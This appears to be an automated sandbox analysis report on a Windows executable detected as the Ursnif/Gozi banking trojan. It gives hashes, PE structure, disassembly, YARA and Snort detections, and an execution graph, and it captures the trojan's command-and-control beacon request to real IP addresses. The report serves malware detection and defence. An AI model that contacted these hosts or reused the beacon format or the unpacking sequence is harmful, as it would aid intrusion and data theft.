                            lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.141.36
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.141.36
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.138.6
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.138.6
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.138.6
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.103
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.103
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.103
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.103
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.103
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.103

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.825405817982751
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:KOYCdGz80D.exe
                            File size:240128
                            MD5:d09f787a952a6e946656ac9184768fbe
                            SHA1:c3c3cbad8d40c7ba332c2b6d7ae0464d092c0877
                            SHA256:8cd071a056f555c793b95c82f9eff1fcf60e304a1e9589988e9819f27a754256
                            SHA512:d99dbae675932c18280103de4553777aaebe051a6da11a651a665a34c5bdf3aef2b97f1ab8195d652572b6a7e9ae9547fc583b9e666c1ee9715561f3fd2af345
                            SSDEEP:3072:T1rxrNcNq2GawilCy9y1UKk4BauPffL1xrN2fKdGJh0RxW2NM6BoaM6:LNyqAwgCQmouPnL1xN2kQ2NMioa
                            TLSH:00348E1272D0A871E7324631BE2BD3B5661EFCA18F5D6AEB23846A2F4D711E1CE71341
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L...;c5b...........................

                            File Icon

                            Icon Hash:9a82024281828a84

                            Static PE Info

                            General

                            Entrypoint:0x409761
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6235633B [Sat Mar 19 04:59:39 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:ae274c29ca15928cb1e23f2e712ba155

                            Entrypoint Preview

                            Instruction
                            call 00007FB2F8A8F4AEh
                            jmp 00007FB2F8A88ECEh
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            mov eax, dword ptr [ebp+08h]
                            test eax, eax
                            je 00007FB2F8A89054h
                            sub eax, 08h
                            cmp dword ptr [eax], 0000DDDDh
                            jne 00007FB2F8A89049h
                            push eax
                            call 00007FB2F8A88667h
                            pop ecx
                            pop ebp
                            ret
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            mov eax, dword ptr [ebp+08h]
                            push esi
                            mov esi, ecx
                            mov byte ptr [esi+0Ch], 00000000h
                            test eax, eax
                            jne 00007FB2F8A890A5h
                            call 00007FB2F8A8C01Dh
                            mov dword ptr [esi+08h], eax
                            mov ecx, dword ptr [eax+6Ch]
                            mov dword ptr [esi], ecx
                            mov ecx, dword ptr [eax+68h]
                            mov dword ptr [esi+04h], ecx
                            mov ecx, dword ptr [esi]
                            cmp ecx, dword ptr [0042D710h]
                            je 00007FB2F8A89054h
                            mov ecx, dword ptr [0042D4C8h]
                            test dword ptr [eax+70h], ecx
                            jne 00007FB2F8A89049h
                            call 00007FB2F8A8FE88h
                            mov dword ptr [esi], eax
                            mov eax, dword ptr [esi+04h]
                            cmp eax, dword ptr [0042D3D0h]
                            je 00007FB2F8A89058h
                            mov eax, dword ptr [esi+08h]
                            mov ecx, dword ptr [0042D4C8h]
                            test dword ptr [eax+70h], ecx
                            jne 00007FB2F8A8904Ah
                            call 00007FB2F8A8F6E7h
                            mov dword ptr [esi+04h], eax
                            mov eax, dword ptr [esi+08h]
                            test byte ptr [eax+70h], 00000002h
                            jne 00007FB2F8A89056h
                            or dword ptr [eax+70h], 02h
                            mov byte ptr [esi+0Ch], 00000001h
                            jmp 00007FB2F8A8904Ch
                            mov ecx, dword ptr [eax]
                            mov dword ptr [esi], ecx
                            mov eax, dword ptr [eax+04h]
                            mov dword ptr [esi+04h], eax
                            mov eax, esi
                            pop esi
                            pop ebp
                            retn 0004h
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            sub esp, 10h
                            mov eax, dword ptr [0042CCD8h]
                            xor eax, ebp
                            mov dword ptr [ebp-04h], eax
                            mov edx, dword ptr [ebp+18h]
                            push ebx

                            Rich Headers

                            Programming Language:
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2010 build 30319
                            • [RES] VS2010 build 30319
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x18f6c0x78.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000xdd08.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43200x40.text
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x18a140x18c00False0.5078519570707071data6.314209619196138IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x1a0000x912480x13c00False0.9314057555379747data7.829501179808203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0xac0000xdd080xde00False0.40860782657657657data4.398436868519861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_CURSOR0xb7f480x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
                            RT_CURSOR0xb80900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
                            RT_CURSOR0xb81c00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
                            RT_CURSOR0xb82b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                            RT_ICON0xac5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
                            RT_ICON0xac5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
                            RT_ICON0xac5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
                            RT_ICON0xace880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
                            RT_ICON0xace880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
                            RT_ICON0xace880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
                            RT_ICON0xadf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
                            RT_ICON0xadf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
                            RT_ICON0xadf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
                            RT_ICON0xae8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
                            RT_ICON0xae8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
                            RT_ICON0xae8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
                            RT_ICON0xb0da80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
                            RT_ICON0xb0da80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
                            RT_ICON0xb0da80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
                            RT_ICON0xb1e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
                            RT_ICON0xb1e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
                            RT_ICON0xb1e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
                            RT_ICON0xb2d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
                            RT_ICON0xb2d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
                            RT_ICON0xb2d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
                            RT_ICON0xb33f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
                            RT_ICON0xb33f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
                            RT_ICON0xb33f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
                            RT_ICON0xb39580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
                            RT_ICON0xb39580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
                            RT_ICON0xb39580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
                            RT_ICON0xb5f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
                            RT_ICON0xb5f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
                            RT_ICON0xb5f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
                            RT_ICON0xb6fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
                            RT_ICON0xb6fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
                            RT_ICON0xb6fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
                            RT_ICON0xb79300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
                            RT_ICON0xb79300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
                            RT_ICON0xb79300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
                            RT_STRING0xb95d80x3bedataSami LappishFinland
                            RT_STRING0xb95d80x3bedataSami LappishNorway
                            RT_STRING0xb95d80x3bedataSami LappishSweden
                            RT_STRING0xb99980x36adataSami LappishFinland
                            RT_STRING0xb99980x36adataSami LappishNorway
                            RT_STRING0xb99980x36adataSami LappishSweden
                            RT_ACCELERATOR0xb7ea80x90dataSami LappishFinland
                            RT_ACCELERATOR0xb7ea80x90dataSami LappishNorway
                            RT_ACCELERATOR0xb7ea80x90dataSami LappishSweden
                            RT_ACCELERATOR0xb7e000xa8dataSami LappishFinland
                            RT_ACCELERATOR0xb7e000xa8dataSami LappishNorway
                            RT_ACCELERATOR0xb7e000xa8dataSami LappishSweden
                            RT_GROUP_CURSOR0xb80780x14data
                            RT_GROUP_CURSOR0xb93580x30data
                            RT_GROUP_ICON0xb1e500x30dataSami LappishFinland
                            RT_GROUP_ICON0xb1e500x30dataSami LappishNorway
                            RT_GROUP_ICON0xb1e500x30dataSami LappishSweden
                            RT_GROUP_ICON0xadf300x22dataSami LappishFinland
                            RT_GROUP_ICON0xadf300x22dataSami LappishNorway
                            RT_GROUP_ICON0xadf300x22dataSami LappishSweden
                            RT_GROUP_ICON0xb7d980x68dataSami LappishFinland
                            RT_GROUP_ICON0xb7d980x68dataSami LappishNorway
                            RT_GROUP_ICON0xb7d980x68dataSami LappishSweden
                            RT_VERSION0xb93880x24cdata
                            None0xb7f380xadataSami LappishFinland
                            None0xb7f380xadataSami LappishNorway
                            None0xb7f380xadataSami LappishSweden

                            Imports

                            DLLImport
                            KERNEL32.dllPulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
                            USER32.dllLoadMenuW
                            ADVAPI32.dllLookupAccountSidW
                            SHELL32.dllFindExecutableA
                            ole32.dllCoGetInstanceFromFile

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            Sami LappishFinland
                            Sami LappishNorway
                            Sami LappishSweden

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.762.173.142.5149700802033203 03/14/23-15:00:52.733532TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4970080192.168.2.762.173.142.51
                            192.168.2.762.173.142.5149700802033204 03/14/23-15:00:52.733532TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970080192.168.2.762.173.142.51

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 14, 2023 15:00:52.673491001 CET4970080192.168.2.762.173.142.51
                            Mar 14, 2023 15:00:52.732873917 CET804970062.173.142.51192.168.2.7
                            Mar 14, 2023 15:00:52.733180046 CET4970080192.168.2.762.173.142.51
                            Mar 14, 2023 15:00:52.733531952 CET4970080192.168.2.762.173.142.51
                            Mar 14, 2023 15:00:52.793348074 CET804970062.173.142.51192.168.2.7
                            Mar 14, 2023 15:00:52.794256926 CET804970062.173.142.51192.168.2.7
                            Mar 14, 2023 15:00:52.794380903 CET4970080192.168.2.762.173.142.51
                            Mar 14, 2023 15:00:52.803956032 CET4970080192.168.2.762.173.142.51
                            Mar 14, 2023 15:00:52.863280058 CET804970062.173.142.51192.168.2.7
                            Mar 14, 2023 15:01:12.834670067 CET4970180192.168.2.794.103.183.153
                            Mar 14, 2023 15:01:15.835302114 CET4970180192.168.2.794.103.183.153

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 14, 2023 14:59:32.458257914 CET5947753192.168.2.78.8.8.8
                            Mar 14, 2023 14:59:32.485673904 CET53594778.8.8.8192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 14, 2023 14:59:32.458257914 CET192.168.2.78.8.8.80xb87dStandard query (0)checklist.skype.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 14, 2023 14:59:32.485673904 CET8.8.8.8192.168.2.70xb87dName error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • 62.173.142.51

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.74970062.173.142.5180C:\Users\user\Desktop\KOYCdGz80D.exe
                            TimestampkBytes transferredDirectionData
                            Mar 14, 2023 15:00:52.733531952 CET101OUTGET /drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 62.173.142.51
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:14:59:10
                            Start date:14/03/2023
                            Path:C:\Users\user\Desktop\KOYCdGz80D.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\KOYCdGz80D.exe
                            Imagebase:0x400000
                            File size:240128 bytes
                            MD5 hash:D09F787A952A6E946656AC9184768FBE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            Reputation:low

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:6.3%
                              Dynamic/Decrypted Code Coverage:96.9%
                              Signature Coverage:46.1%
                              Total number of Nodes:128
                              Total number of Limit Nodes:16
                              execution_graph 4886 401de1 HeapCreate 4887 401dfa GetModuleHandleA GetCommandLineW 4886->4887 4888 401e1f ExitProcess 4886->4888 4891 4019f1 4887->4891 4923 401d68 CreateEventA 4891->4923 4893 401ba4 HeapDestroy 4893->4888 4895 401a1e NtQuerySystemInformation 4896 4019fc 4895->4896 4896->4893 4896->4895 4930 4012e6 HeapAlloc 4896->4930 4931 401688 4896->4931 4951 401ba9 HeapFree 4896->4951 4900 401a7b 4900->4893 4901 401a85 GetLocaleInfoA 4900->4901 4902 401ab7 4901->4902 4903 401a9f GetSystemDefaultUILanguage VerLanguageNameA 4901->4903 4904 401b96 4902->4904 4937 401800 4902->4937 4903->4902 4904->4893 4906 401b9e GetLastError 4904->4906 4906->4893 4908 401ad3 GetLongPathNameW 4909 401ae7 4908->4909 4922 401b05 CreateThread 4908->4922 4949 4012e6 HeapAlloc 4909->4949 4912 401b33 QueueUserAPC 4915 401b69 4912->4915 4916 401b4d GetLastError TerminateThread CloseHandle SetLastError 4912->4916 4913 401b8d GetLastError 4913->4904 4914 401af1 4918 401afa GetLongPathNameW 4914->4918 4914->4922 4915->4913 4917 401b6d WaitForSingleObject 4915->4917 4916->4915 4919 401b88 CloseHandle 4917->4919 4920 401b7d GetExitCodeThread 4917->4920 4950 401ba9 HeapFree 4918->4950 4919->4904 4920->4919 4922->4912 4922->4913 4924 401d86 GetVersion 4923->4924 4925 401dda GetLastError 4923->4925 4926 401d90 4924->4926 4927 401d9d GetCurrentProcessId OpenProcess 4926->4927 4928 401dd5 4926->4928 4929 401dca 4927->4929 4928->4896 4929->4896 4930->4896 4932 4016af 4931->4932 4933 4017ed Sleep 4932->4933 4952 4012e6 HeapAlloc 4932->4952 4933->4896 4933->4900 4935 40171e 4935->4933 4953 401ba9 HeapFree 4935->4953 4954 4012e6 HeapAlloc 4937->4954 4939 40181e 4940 401824 GetModuleFileNameW 4939->4940 4941 401877 4939->4941 4942 401855 4940->4942 4946 401836 4940->4946 4941->4908 4941->4922 4942->4941 4944 401860 4942->4944 4945 401867 GetLastError 4942->4945 4944->4941 4957 401ba9 HeapFree 4945->4957 4946->4940 4946->4942 4955 401ba9 HeapFree 4946->4955 4956 4012e6 HeapAlloc 4946->4956 4949->4914 4950->4922 4951->4896 4952->4935 4953->4933 4954->4939 4955->4946 4956->4946 4957->4944 4958 410a56 4961 410a62 4958->4961 4959 410a6e 4960 410a90 RtlAllocateHeap 4960->4959 4960->4961 4961->4959 4961->4960 4962 824f05 4963 824f14 4962->4963 4966 8256a5 4963->4966 4968 8256c0 4966->4968 4967 8256c9 CreateToolhelp32Snapshot 4967->4968 4969 8256e5 Module32First 4967->4969 4968->4967 4968->4969 4970 8256f4 4969->4970 4971 824f1d 4969->4971 4973 825364 4970->4973 4974 82538f 4973->4974 4975 8253a0 VirtualAlloc 4974->4975 4976 8253d8 4974->4976 4975->4976 4976->4976 4977 40139f 4978 4013b8 4977->4978 4989 401d3c ConvertStringSecurityDescriptorToSecurityDescriptorA 4978->4989 4980 4013cc 4990 401882 4980->4990 4982 4013f1 4983 4013f5 lstrlenW 4982->4983 4988 40144c ExitThread 4982->4988 4995 4015b0 GetSystemTimeAsFileTime 4983->4995 4986 401418 5006 4012fb 4986->5006 4989->4980 4992 4018e3 4990->4992 4993 40198e 4992->4993 5017 4012e6 HeapAlloc 4992->5017 5018 401ba9 HeapFree 4992->5018 4993->4982 4996 4015d8 CreateFileMappingW 4995->4996 4998 401671 GetLastError 4996->4998 4999 401629 4996->4999 5000 401652 4998->5000 5001 401642 MapViewOfFile 4999->5001 5002 401634 GetLastError 4999->5002 5000->4986 5001->5000 5004 401660 GetLastError 5001->5004 5002->5001 5003 40163d 5002->5003 5005 401668 CloseHandle 5003->5005 5004->5000 5004->5005 5005->5000 5019 401202 5006->5019 5008 401393 5008->4988 5009 401337 5009->5008 5010 401381 5009->5010 5032 401000 5009->5032 5043 401ba9 HeapFree 5010->5043 5016 401379 GetLastError 5016->5010 5017->4992 5018->4992 5044 4012e6 HeapAlloc 5019->5044 5021 401210 5022 4012c6 5021->5022 5023 40121a GetModuleHandleA GetProcAddress 5021->5023 5022->5009 5024 401251 GetProcAddress 5023->5024 5025 4012bf 5023->5025 5024->5025 5027 401267 GetProcAddress 5024->5027 5025->5022 5051 401ba9 HeapFree 5025->5051 5027->5025 5028 40127d GetProcAddress 5027->5028 5028->5025 5029 401293 GetProcAddress 5028->5029 5029->5025 5030 4012a9 5029->5030 5045 40110b NtCreateSection 5030->5045 5033 4010f7 5032->5033 5035 401023 5032->5035 5033->5010 5038 4014cf VirtualProtect 5033->5038 5034 401034 LoadLibraryA 5034->5033 5034->5035 5035->5033 5035->5034 5037 40109d 5035->5037 5036 4010a6 GetProcAddress 5036->5037 5037->5035 5037->5036 5039 401364 5038->5039 5040 401518 5038->5040 5039->5010 5039->5016 5040->5039 5041 40156e VirtualProtect 5040->5041 5041->5040 5042 401583 GetLastError 5041->5042 5042->5040 5043->5008 5044->5021 5046 40116f 5045->5046 5050 40119c 5045->5050 5052 401459 NtMapViewOfSection 